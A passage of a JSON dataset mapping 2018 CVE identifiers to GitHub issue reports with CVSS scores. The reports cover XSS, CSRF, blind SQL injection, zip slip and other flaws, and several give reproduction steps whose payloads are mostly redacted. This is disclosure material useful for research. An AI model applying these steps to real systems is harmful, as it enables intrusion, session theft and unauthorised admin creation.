        "Issue_Created_At": "2018-10-24T04:28:13Z",
        "description": "Performance issue with malicious APITAG input. (note: moved from URLTAG reported by APITAG It looks the same as: URLTAG Reproduced by the following commit: URLTAG The security bug is in APITAG and APITAG of the APITAG artifact: CODETAG W/A is to use custom serializers for all types that are parsed with APITAG and APITAG by registering them after (or instead of) registration of the APITAG module.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000874",
        "Issue_Url_old": "https://github.com/cebe/markdown/issues/166",
        "Issue_Url_new": "https://github.com/cebe/markdown/issues/166",
        "Repo_new": "cebe/markdown",
        "Issue_Created_At": "2018-12-05T15:18:55Z",
        "description": "Cross site scripting vulnerability. Issue There is a reflected and/or stored xss vulnerability in all of the following parsers: APITAG Markdown APITAG How? The vulnerability occurs when a user crafts a malicious payload and wraps the payload in NUMBERTAG backticks, thus bypassing the parser special character escape. For example: Here is an image of the payloads crafted with single, double, and triple backticks: APITAG And here is an image of the payloads rendered: FILETAG As you can see when the payload is crafted correctly using three backticks, the parser will render it as a script, this can allow malicious individuals to render scripts within a APITAG file on any platform that is using this as the markdown parser. An example of a ran script: FILETAG Impact Doing a quick search on Github for the code that enables your parser: APITAG . I get this many results: FILETAG The vulnerability can be either stored using an APITAG file ( README for example), or reflected if the markdown parser is just parsing the user input text. Malicious attackers can use this method to steal sensitive user data. For example to steal a users cookies: FILETAG This can allow serious impacts on not only the end users using the site, but the reputation of the website as well.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000875",
        "Issue_Url_old": "https://github.com/BOINC/boinc/issues/2907",
        "Issue_Url_new": "https://github.com/boinc/boinc/issues/2907",
        "Repo_new": "boinc/boinc",
        "Issue_Created_At": "2018-12-11T15:25:09Z",
        "description": "BOINC Website Vulnerability. A vulnerability has been identified that will allow any user to create a specially crafted request and obtain the authenticator of any user of the system. This vulnerability was added to the master branch on October NUMBERTAG as part of merge commit APITAG It was fixed in the master branch on December NUMBERTAG th NUMBERTAG as part of merge commit APITAG The vulnerability was also present in server releases NUMBERTAG and NUMBERTAG and is fixed in server release NUMBERTAG see URLTAG It was not present in earlier versioned releases. Projects who updated their website between October NUMBERTAG th NUMBERTAG and December NUMBERTAG th NUMBERTAG are strongly urged to update their website as soon as possible or to implement the workaround described below. Thank you to Juha Sointusalo for identifying the vulnerability and thank you to Shawn Kwang for implementing the fix. How Projects Can Check if Vulnerable: If the file PATHTAG is not present, then you are not vulnerable. If it is present, then run the following command from your project directory: grep logintoken PATHTAG | wc l If it returns NUMBERTAG then your project is vulnerable. If it returns something greater than or equal to NUMBERTAG then your project has the fix. Mitigation: If you are not able to update your website immediately, then you can remove the risk by deleting the file: PATHTAG Since this will break the user consent code, then you need to set APITAG to NUMBERTAG in FILETAG until you are able to update your website. See URLTAG for details about this setting.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000887",
        "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/1",
        "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/1",
        "Repo_new": "advisto/peel-shopping",
        "Issue_Created_At": "2018-12-16T15:38:27Z",
        "description": "Stored Cross site Scripting in APITAG parameter. Vulnerability Name: Stored Cross site Scripting in APITAG Name EN \" Parameter Vulnerability Description: An authenticated user can inject malicious javascript code into the APITAG Name EN\" field thus many of the modules are affected by this because the site name is visible in almost of all modules. Vulnerable URL: FILETAG Please saw the APITAG below FILETAG Mitigation: the Entire site is Vulnerable to Cross site scripting attacks input validation should be properly implemented References for Mitigation Vulnerability: URLTAG url",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-1000890",
        "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/37",
        "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/37",
        "Repo_new": "frontaccountingerp/fa",
        "Issue_Created_At": "2018-12-19T17:53:24Z",
        "description": "Time Based Blind SQL Injection in APITAG Parameter. Vulnerability Name : Time Based Blind SQL Injection in APITAG Parameter Vulnerability Description: APITAG Parameter in FILETAG file suffer from the Blind SQL Injection, By using the an attacker can grab the Backend Database Information APITAG ERRORTAG Step1: Open the Burp Suite go to the Repeater tab copy the above Contents Step2: Click on the right side penlike icon configure the your ipaddress and port address and click save Step3: Click on \"Go\" Button you will see the response cause the time delay NUMBERTAG seconds. Step4: Change the sleep function value what ever you want and click on \"go\" you will see the time delay what ever you give value to the sleep function. APITAG Video: FILETAG Mitigation: See the OWASP SQL Injection Prevention sheet on this URLTAG link",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1002101",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/65750",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/65750",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2018-07-03T08:06:15Z",
        "description": "smb mount security issue. APITAG Is this a BUG REPORT or FEATURE REQUEST? : /kind bug > Uncomment only one, leave it on its own line: > > /kind bug > /kind feature What happened : user APITAG Environment Variables to store user input string to prevent command line injection, the env var in APITAG would be taken as literal values and not as executable vulnerable code, this kind of fix is common for command line injection issue (called: parameterized way) What you expected to happen : How to reproduce it (as minimally and precisely as possible) : Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): Cloud provider or hardware configuration: OS (e.g. from /etc/os release): Kernel (e.g. ERRORTAG ): Install tools: Others: /sig windows /sig storage /assign",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1002102",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/85867",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/85867",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-12-03T22:58:37Z",
        "description": "CVETAG : Unvalidated redirect. CVSS Rating: PATHTAG APITAG URLTAG An attacker controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube apiservers will follow the redirect as a GET request with client cert credentials for authenticating to the Kubelet. Am I vulnerable? Kubernetes API servers with the APITAG feature URLTAG enabled AND without the APITAG feature are affected. API servers using SSH tunnels ( ssh user / ssh keyfile) are not affected. Using the default feature gate values, kube apiserver versions before NUMBERTAG are affected. How do I mitigate this vulnerability? For Kubernetes versions NUMBERTAG the APITAG can be manually enabled with the APITAG flag APITAG . Fix impact The APITAG feature will cause the kube apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built in dockershim & setting the kubelet flag APITAG ), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting APITAG on the kubelet to avoid issues. Fixed Versions Kubernetes NUMBERTAG Fixed by default in URLTAG Kubernetes NUMBERTAG Fix available as alpha in URLTAG Additional Details In a future release, we plan to deprecate the APITAG feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests). Acknowledgements This vulnerability was reported by Alban Crequy. /area security /kind bug /committee product security /sig api machinery node /area apiserver /close",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 2.6,
        "impactScore": 1.4,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2018-1002103",
        "Issue_Url_old": "https://github.com/kubernetes/minikube/issues/3208",
        "Issue_Url_new": "https://github.com/kubernetes/minikube/issues/3208",
        "Repo_new": "kubernetes/minikube",
        "Issue_Created_At": "2018-10-02T21:34:31Z",
        "description": "minikube dashboard host checking.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1002105",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/71411",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/71411",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2018-11-26T11:07:36Z",
        "description": "Proxy connection gets stuck on error response. What happened : When proxying to a backend server, if the server returns an error response, the connection gets stuck. What you expected to happen : The error would be returned and the connection would be closed. /kind bug /kind api machinery /assign",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1002208",
        "Issue_Url_old": "https://github.com/icsharpcode/SharpZipLib/issues/232",
        "Issue_Url_new": "https://github.com/icsharpcode/sharpziplib/issues/232",
        "Repo_new": "icsharpcode/sharpziplib",
        "Issue_Created_At": "2018-06-11T10:21:47Z",
        "description": "SECURITY: vulnerable to zip slip (possible remote code execution/file overwrite). Background URLTAG Steps to reproduce NUMBERTAG get a malicious zip file, i.e. URLTAG NUMBERTAG unpack with APITAG NUMBERTAG profit Expected behavior either the whole extraction should be stopped, or the files that are being extracted outside of the destination folder should not be extracted. Actual behavior All files are extracted. Version of APITAG All Obtained from (place an x between the brackets for all that apply) [x] Compiled from source branch: all commit: any [x] Downloaded DLL from APITAG [x] Downloaded DLL from APITAG [x] Downloaded DLL from _______ [x] DLL included as part of Package installed using: [x] APITAG [x] APITAG [x] Chocolatey",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10023",
        "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/1",
        "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/1",
        "Repo_new": "xwlrbh/catfish",
        "Issue_Created_At": "2018-04-11T14:12:58Z",
        "description": "There is storage XSS vulnerability in Comment. Registered user login, comment on the article. POC, APITAG Submit comment to grab packet, use burp modify parameter pinglun= APITAG FILETAG Browse article or administrator login background can trigger",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10028",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/422",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/422",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-04-11T10:13:23Z",
        "description": "Two vulnerabilities. APITAG configuration, installation files do not delete url: URLTAG FILETAG APITAG configuration, log folder can be accessed, and sensitive information leakage will appear, url:url: URLTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10059",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1457",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/1457",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2018-03-07T21:38:23Z",
        "description": "Path Based Cross Site Scripting (XSS) issues. Running version NUMBERTAG on Windows NUMBERTAG with IIS My company's security scan has picked up NUMBERTAG application vulnerabilities with NUMBERTAG of them being high. Most of these are for Path Based Cross Site Scripting (XSS). I don't see this addressed in any of the newer versions. The list is long but I can leave a few examples. Below are a couple. If this is of any value I can provide more. Example NUMBERTAG URL: URLTAG Threat XSS vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload. In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. Impact XSS exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used to as a part of a compromise. Solution Corp Guidance: The solution below is general guidance, not a Corp Solution ready for deployment. You will need to fully test/validate this solution and involve Corp IT to properly validate. Filter all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG Detection Information Parameter No Param has been required for detecting the information. Booyah! Authentication Required Access Path Here is the path followed by the scanner to reach the exploitable URL: N/A Payloads ( Instance NUMBERTAG of NUMBERTAG Request Payload APITAG > Request GET URLTAG NUMBERTAG Referer: FILETAG NUMBERTAG Cookie: APITAG NUMBERTAG Response comment: Response content type: text/html APITAG APITAG APITAG APITAG Login APITAG APITAG APITAG APITAG '> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Example NUMBERTAG URL: URLTAG Threat XSS vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload. In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. Impact XSS exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used to as a part of a compromise. Solution Corp Guidance: The solution below is general guidance, not a Corp Solution ready for deployment. You will need to fully test/validate this solution and involve Corp IT to properly validate. Filter all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG Detection Information Parameter No Param has been required for detecting the information. Booyah! Authentication Required Access Path Here is the path followed by the scanner to reach the exploitable URL: N/A Payloads ( Instance NUMBERTAG of NUMBERTAG Request Payload APITAG Request GET URLTAG NUMBERTAG Referer: FILETAG NUMBERTAG Cookie: APITAG NUMBERTAG Response comment: Response content type: text/html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Login APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG </",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-10073",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/423",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/423",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-04-12T07:32:31Z",
        "description": "Another Cross Site Scripting Vulnerability. joyplus cms NUMBERTAG has Another Cross Site Scripting: requests: ERRORTAG ` payload: \"> APITAG // APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10096",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/424",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/424",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-04-13T14:38:42Z",
        "description": "joyplus cms NUMBERTAG has Another Cross Site Scripting: requests:. requests: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Then look at the web page, the code is executed FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10117",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/20",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/20",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-04-15T09:29:50Z",
        "description": "CSRF issue that allows attacker to create an account. Hello. I want to report it has CSRF issue in admin pages. When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention. Here is how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Keep login and access the html it has following content APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG And account username = hacker is created without admin user's intention.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10118",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/436",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/436",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-04-15T04:30:21Z",
        "description": "Stored XSS APITAG Authentication). Two Stored XSS reported NUMBERTAG title section) and NUMBERTAG content section) I found another Stored XSS lie in Name filed in the same page ( PATHTAG ) Steps to reproduce: APITAG monstra FILETAG APITAG visit URLTAG APITAG Create New Page button to create a new page APITAG in Name field with payload APITAG APITAG and Exit NUMBERTAG isit the page you just created, then Stored XSS will be triggered Impacts: Anyone who visit the target page will trigger APITAG code execution, including administrator, editor, and guest. Affected Version NUMBERTAG or before Affected URL: FILETAG Testing Environment: Win7 with XAMPP: APITAG \u3001 PHP Version NUMBERTAG Analysis vulnerable page : FILETAG line NUMBERTAG all post data without any sanitization, just add and display Add page and edit page are vulnerable. Mitigation: Filter user input ,please refer NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10121",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/437",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/437",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-04-15T14:03:50Z",
        "description": "ERRORTAG page have Stored XSS Vulnerability. Stored XSS reported NUMBERTAG title section NUMBERTAG content section NUMBERTAG title section) I found another stored XSS in ERRORTAG page(name field),the Vulnerability source in PATHTAG Affected Version NUMBERTAG or before Payload: APITAG Steps to replicate NUMBERTAG Goto URLTAG NUMBERTAG Click Edit ERRORTAG page ( URLTAG NUMBERTAG Enter payload in title section and save NUMBERTAG isit FILETAG NUMBERTAG You will triage Javascript execution Impacts: A user with editor level privileges can make APITAG code execution in admin's session. Testing Environment: APITAG + APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-10122",
        "Issue_Url_old": "https://github.com/goodrain-apps/chanzhieps/issues/1",
        "Issue_Url_new": "https://github.com/goodrain-apps/chanzhieps/issues/1",
        "Repo_new": "goodrain-apps/chanzhieps",
        "Issue_Created_At": "2018-04-16T01:28:38Z",
        "description": "Front desk arbitrary file reading NUMBERTAG download url FILETAG poc APITAG vul file in APITAG Controllable parameters APITAG ,$pathname ,$extension, Final execution is APITAG while APITAG = APITAG APITAG = APITAG . $pathname; APITAG = APITAG APITAG = APITAG '/') . PATHTAG result APITAG \"r\");",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-10127",
        "Issue_Url_old": "https://github.com/gosea/xyhcms/issues/1",
        "Issue_Url_new": "https://github.com/gosea/xyhcms/issues/1",
        "Repo_new": "gosea/xyhcms",
        "Issue_Created_At": "2018-04-16T07:51:13Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page will add an administrator role ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10128",
        "Issue_Url_old": "https://github.com/gosea/xyhcms/issues/2",
        "Issue_Url_new": "https://github.com/gosea/xyhcms/issues/2",
        "Repo_new": "gosea/xyhcms",
        "Issue_Created_At": "2018-04-16T08:31:55Z",
        "description": "There is a XSS vulnerability that can execute the APITAG code. url: URLTAG URL is written to the HTML page and closed by using \u2018>. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10177",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1095",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1095",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-04-16T22:11:54Z",
        "description": "Infinite loop in APITAG ( PATHTAG ). Commit: APITAG Description In latest commit of APITAG there is an infinite loop in APITAG function of PATHTAG file, which could be triggered by the attached POC. The issue is in the following loop, and seems that image_info is never updated inside the loop (line NUMBERTAG static Image APITAG mng_info, const APITAG image_info NUMBERTAG APITAG exception NUMBERTAG do NUMBERTAG while APITAG >magick,\"MNG NUMBERTAG Steps to Reproduce NUMBERTAG install libpng NUMBERTAG checkout commit APITAG of APITAG NUMBERTAG compile APITAG and run: PATHTAG $POC FILETAG . System Configuration APITAG version: APITAG Environment APITAG system, version and so on): Linux test NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Oct NUMBERTAG UTC NUMBERTAG APITAG Stack Trace NUMBERTAG ffff6cafc NUMBERTAG in __GI___fxstat (vers=<optimized out>, fd NUMBERTAG buf NUMBERTAG ac8) at PATHTAG NUMBERTAG ffff NUMBERTAG af9d in APITAG (image NUMBERTAG ca NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG d8a NUMBERTAG in APITAG (mng_info NUMBERTAG image_info NUMBERTAG b NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in APITAG (image_info NUMBERTAG b NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a1d0c in APITAG (image_info NUMBERTAG d NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG b in APITAG (image_info NUMBERTAG a NUMBERTAG filename NUMBERTAG c NUMBERTAG APITAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG e in APITAG (image_info NUMBERTAG a NUMBERTAG argc NUMBERTAG arg NUMBERTAG b NUMBERTAG metadata NUMBERTAG fffffffbcc0, exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG eb NUMBERTAG in APITAG (image_info NUMBERTAG command NUMBERTAG fb0 APITAG argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG metadata NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at PATHTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10183",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/333",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/333",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-04-17T12:41:08Z",
        "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Cross site Scripting (XSS) in bigtreecms NUMBERTAG The vulnerability is in PATHTAG FILETAG POC\uff1a PATHTAG APITAG APITAG alert NUMBERTAG APITAG &file=charsets FILETAG thank you~",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10185",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/1",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/1",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2018-04-17T13:39:09Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in\uff0cwe can use the poc to add a admin\uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-10187",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9913",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9913",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-17T14:40:15Z",
        "description": "heap buffer overflow in dalvik_op ( PATHTAG ). Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | dex | Architecture/bits of the file (mandatory) | Dalvik dex file version NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Success processing of dex file Actual behavior heap buffer overflow Steps to reproduce the behavior NUMBERTAG checkout commit APITAG NUMBERTAG compile with ASAN enabled NUMBERTAG download the attached POC NUMBERTAG run: bin/radare2 A $POC Vulnerable code PATHTAG NUMBERTAG static int APITAG anal, APITAG op, ut NUMBERTAG addr, const ut8 data, int len NUMBERTAG case NUMBERTAG a: // goto NUMBERTAG if (len NUMBERTAG op >jump = addr + (int)(data FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10191",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/3995",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/3995",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2018-04-10T18:31:36Z",
